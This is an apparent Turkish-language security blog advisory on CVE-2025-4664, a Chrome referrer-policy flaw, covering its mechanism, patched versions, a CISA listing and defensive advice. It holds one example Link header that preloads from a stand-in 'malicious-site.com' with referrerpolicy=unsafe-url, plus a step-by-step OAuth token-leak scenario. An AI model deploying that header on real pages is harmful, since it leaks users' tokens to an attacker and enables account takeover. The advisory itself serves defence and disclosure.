Google Chrome'da Yüksek Riskli Referrer-Policy Açığı

🎯 CVE-2025-4664: Google Chrome'da Yüksek Riskli Referrer-Policy Açığı

📅 Yayın Tarihi: 15 Mayıs 2025

🧠 Özet

CVE-2025-4664, Google Chrome’un Loader bileşeninde keşfedilen ve aktif olarak istismar edilen kritik bir güvenlik açığıdır. Açık, özel olarak hazırlanmış sayfalar üzerinden hassas verilerin farklı kaynaklara sızmasına yol açabiliyor. Bu durum özellikle OAuth kimlik doğrulama akışlarında ciddi bir tehdit oluşturmaktadır.


🔍 Teknik Analiz

Zafiyetin Kaynağı:
Chrome’un Link başlıklarını işlerken referrer-policy ayarını ihmal etmesi.

Etkilenen Bileşen:
Loader - kaynak önceliklendirme ve yükleme davranışlarını yöneten sistem.

Referrer-Policy Açıklaması:
Saldırganlar, referrer-policy başlığını unsafe-url olarak zorlayarak, hassas URL bilgilerini hedef bir sunucuya iletebilir. Örneğin:

http

Link: <https://malicious-site.com>; rel=preload; as=script; referrerpolicy=unsafe-url

Bu, OAuth token gibi URL'de taşınan bilgilerin üçüncü taraflara sızmasına sebep olabilir.


🔓 İstismar Senaryosu

  1. Kurban kullanıcı, saldırgan tarafından kontrol edilen özel bir HTML sayfasını ziyaret eder.

  2. Sayfa, Link başlığı üzerinden referrerpolicy=unsafe-url tanımlar.

  3. Chrome, bu istekte tam referrer bilgisini (örneğin https://legit-site.com/oauth/callback?token=xyz) sızdırır.

  4. Saldırgan bu bilgiyi kendi sunucusunda toplar ve hesap ele geçirme saldırısı gerçekleştirir.

Bu senaryo özellikle SSO, OAuth2, OpenID Connect gibi yönlendirmeye dayalı kimlik doğrulama sistemlerini hedef alır.


🛡️ Google’ın Müdahalesi 

  • Güncellenmiş Sürümler:

    • Windows/Linux: 136.0.7103.113

    • macOS: 136.0.7103.114

  • Yama İçeriği:

    • Loader bileşeninde referrer-policy'nin dış kaynaklara zorlanmasını engelleyen kontrol eklendi.

    • Güvenli kaynak başlığı yorumlaması yeniden yapılandırıldı.


🚨 CISA Uyarısı 

CISA, CVE-2025-4664’ü "aktif olarak istismar edilen güvenlik açıkları" listesine dahil etti.
Bu, özellikle kamu kurumları, kritik altyapılar ve kurumsal web tabanlı servis sağlayıcılar için tehdidin ciddiyetini artırmaktadır.


🔐 Öneriler – Siber Güvenlik Uzmanları İçin

1. Tarayıcı Güncellemelerini Zorunlu Kılın
Kurumsal ortamınızda tarayıcı sürümlerinin otomatik ve zorunlu olarak güncellendiğinden emin olun.

2. Web Uygulamalarını Gözden Geçirin
OAuth ve benzeri sistemlerinizde token, state, code gibi hassas bilgilerin URL'de taşınıp taşınmadığını kontrol edin.

3. CSP ve Referrer-Policy Ayarlarını İnceleyin
Sunucularınızın Content-Security-Policy ve Referrer-Policy ayarlarının doğru yapılandırıldığından emin olun:

http

Referrer-Policy: strict-origin

4. IDS/IPS Kurallarınızı Güncelleyin
Kötü niyetli Link başlıklarını tespit edebilecek özel imzalar tanımlayın.


💡 Son Söz 

CVE-2025-4664, bir tarayıcı açığının nasıl güvenli varsayılanlar ve doğru referrer yönetimi yapılmadığında büyük güvenlik risklerine dönüşebileceğini gösteriyor. Bu tür zafiyetler yalnızca istemci tarafında değil, aynı zamanda sunucu tarafı güvenlik mimarilerinde de dikkatli planlamayı zorunlu kılıyor.


📎 Referanslar:



Aurora_Feniks

I have extensive experience working on various projects within the IT field, which has provided me with a comprehensive understanding of all areas related to information technology. My expertise in cyber security and my hands-on experience with current scenarios have given me a well-rounded perspective on security issues.

Yorum Gönder

Daha yeni Daha eski

İletişim Formu